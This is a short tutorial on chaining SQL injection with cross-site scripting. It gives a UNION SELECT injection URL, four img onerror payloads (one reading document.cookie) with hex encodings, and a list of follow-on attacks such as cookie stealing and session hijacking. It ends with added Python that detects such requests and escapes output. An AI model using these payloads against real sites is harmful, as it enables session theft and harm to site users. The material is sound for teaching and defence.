XSS Injection with SQLi (XSSQLi)
Injecting XSS into the Query:
Once the number of columns has been determined and the UNION query is ready, the injection can begin. Let's assume there are 4 columns, so the UNION query will be:
http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--
Let's say the 3rd column is printed on the web page as output, so that is where the XSS payload is injected. To keep things simple, the payload is hex encoded.
Our XSS injection Payloads:
<img src=x onerror=confirm(/XSS/)>
<img src=x onerror=confirm(document.domain)>
<img src=x onerror=confirm(document.cookie)>
'"><img src=x onerror=confirm(origin)>
Hex encoded values:
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d28646f63756d656e742e646f6d61696e293e
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d28646f63756d656e742e636f6f6b6965293e
0x27223E3C696D67207372633D78206F6E6572726F723D636F6E6669726D286F726967696E293E
Injecting our payload:
The above URL will output our XSS payload onto the website. This is a basic XSS payload; from here, XSS can be used for other things such as cookie stealing, XSS phishing, XSS iframe phishing, chained XSS, session hijacking, CSRF attacks, XSS DDoS and other attacks.
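As an added defensive example (not part of the original post), the following Python flags request URIs that combine a UNION SELECT with a 0x hex literal that decodes to script-capable HTML, which is exactly the pattern described above, and shows the output-encoding step that neutralises such a payload when it is reflected. The request URIs and the function names are constructed for this example.

```python
import re
import html
from urllib.parse import unquote

# Constructed sample request URIs (not taken from any real log).
SAMPLE_REQUESTS = [
    "/link.php?id=1",
    "/link.php?id=1'+union+select+1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4--",
    "/link.php?id=1'+union+select+1,2,0x48656c6c6f,4--",  # hex literal decodes to plain "Hello"
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})\b")
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.IGNORECASE | re.DOTALL)
# HTML that can run script when reflected: a tag with an on* handler, a <script> tag, or a javascript: URL.
ACTIVE_HTML = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=|<\s*script\b|javascript\s*:", re.IGNORECASE)


def decode_hex_literals(text):
    """Decode every MySQL-style 0x... literal in text to a string (undecodable bytes are replaced)."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        digits = match.group(1)
        if len(digits) % 2:          # odd digit count cannot be a byte string; skip it
            continue
        decoded.append(bytes.fromhex(digits).decode("utf-8", errors="replace"))
    return decoded


def classify_request(uri):
    """Return the indicators found in one request URI (empty list means nothing suspicious)."""
    query = unquote(uri.replace("+", " "))   # normalise URL encoding before matching
    indicators = []
    if UNION_SELECT.search(query):
        indicators.append("union_select")
    for literal in decode_hex_literals(query):
        if ACTIVE_HTML.search(literal):      # the hex hides HTML, not just a number or word
            indicators.append("hex_encoded_active_html")
            break
    return indicators


def safe_render(value):
    """Output-side mitigation: HTML-escape untrusted data before it is written into the page."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        print(uri[:60], "->", classify_request(uri) or "clean")
```

The decode step matters because a filter that only inspects the raw query string never sees the `<img` tag; pairing the detection with parameterised queries and output encoding removes the underlying bug rather than just the signature.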